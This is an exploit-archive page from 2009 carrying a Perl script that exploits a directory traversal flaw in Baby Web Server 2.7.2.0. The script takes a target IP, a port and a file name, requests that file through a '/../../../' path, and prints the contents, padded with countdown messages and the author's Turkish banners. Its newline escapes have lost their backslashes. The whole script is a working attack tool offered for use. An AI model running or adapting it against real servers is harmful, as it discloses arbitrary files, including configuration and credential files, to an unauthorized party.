Baby Web Server 2.7.2.0 Arbitrary File Disclosure Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Baby Web Server 2.7.2.0 Arbitrary File Disclosure Exploit
# Published : 2009-04-29
# Author : ZoRLu
# Previous Title : Symantec Fax Viewer Control 10 (DCCFAXVW.DLL) Remote BOF Exploit
# Next Title : Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit

#!/usr/bin/perl -w
#
# Found By : ZoRLu
# 
# Home: yildirimordulari.com , dafgamers.com , z0rlu.blogspot.com
#
# Not: Bana Bug BulamIyorum, YapamIyorum Demeyin a.q Elin Gavuru YapIyor Sizler Niye YapamIyorsunuz. istemiyorsunuz isteseniz Sizlerde YaparsIn??z
#
# Thanks: Str0ke, Cyber-Zone, Stack, AlpHaNiX, W0cker, Dr.Ly0n, ThE g0bL!N and all Friends
#
# Tested under my vista pc
#
# Download : http://www.mydesign.gen.tr/download/469.html
# 
# Download : http://www.mydesign.gen.tr/yonlen/469.html
#
# Print: http://img186.imageshack.us/img186/8315/86639552.jpg

use LWP::Simple;
use LWP::UserAgent;

print "n Baby Web Server 2.7.2.0 Arbitrary File Disclosure Exploitnn";

print "*************************************************************************n";
print "*             Exploited By : ZoRLu                                      *n";
print "*                      msn : trt-turk[at]hotmail.com                    *n";
print "*                     Home : yildirimordulari.com , dafgamers.com       *n";
print "*                       Not: Turkiye Cumhuriyeti                        *n";
print "*************************************************************************nnnn";

if(@ARGV < 3)
{
print "[-]Exp KullanIm HatasIn";
print "[-]Ornegi inceleyinnn";
&help; exit();
}
sub help()
{
print "[+] KullanIm : perl $0 IP Port Filen";
print "[+] Ornek    : perl $0 127.0.0.1 80 zorlu.inin";
}
($TargetIP, $Port, $File) = @ARGV;
print("Bekle Lutfen ! Server a BaglanIyor...... n");
print("Please Wait  !  Connet to Server ......nnn");
sleep(5);

print("          Z                            Zn");
print("          O                            On");
print("          R        Wait...             Rn");
print("          L                            Ln");
print("          U                            Unnn");


$Not1="Gonlum Bir KitaptIr Bekler Masanda";
$Not2="Okusanda Olur, Okumasanda!!!";
$path="/../../../";
my $y0t = "http://" . $TargetIP . ":" . $Port . $path . $File;
print("islem BasladI....    |80nn");
print("Started....nn");
sleep(1);
print("1n");
sleep(1);
print("2n");
sleep(1);
print("3n");
sleep(1);
print("4n");
sleep(1);
print("5n");
sleep(1);
print("6n");
sleep(1);
print("7n");
sleep(1);
print("8n");
sleep(1);
print("9n");
sleep(1);
print("10n");
sleep(1);
print("11n");
sleep(1);
print("12n");
sleep(1);
print("13n");
sleep(1);
print("14n");
sleep(1);
print("15nn");
sleep(2);
print("islem TamamlandI !!! 5 sn sonra hersey hazIrnn");
print("it is done !!!  you will wait 5 minnn");
print("nn");
print("1n");
sleep(1);
print("2n");
sleep(1);
print("3n");
sleep(1);
print("4n");
sleep(1);
print("5nn");
sleep(1);
print("TamamdIr!!!nn");
print("Done!!!nn");
sleep(2);
$ourfile=get $y0t;
if($ourfile){
print("nnn............Our File...........nn");
print("$ourfile nn");
print(".........................EOF.......................nn");
print("islem Tamamnn");
print("Not:nn");
print("$Not1n");
print("$Not2nnn");
}
else
{
print(".........................EOF.......................nn");
print(" Dosya BulunamadI !!!nn");
print(" Not Found !!!nn");
exit;
}

# www.Syue.com [2009-04-29]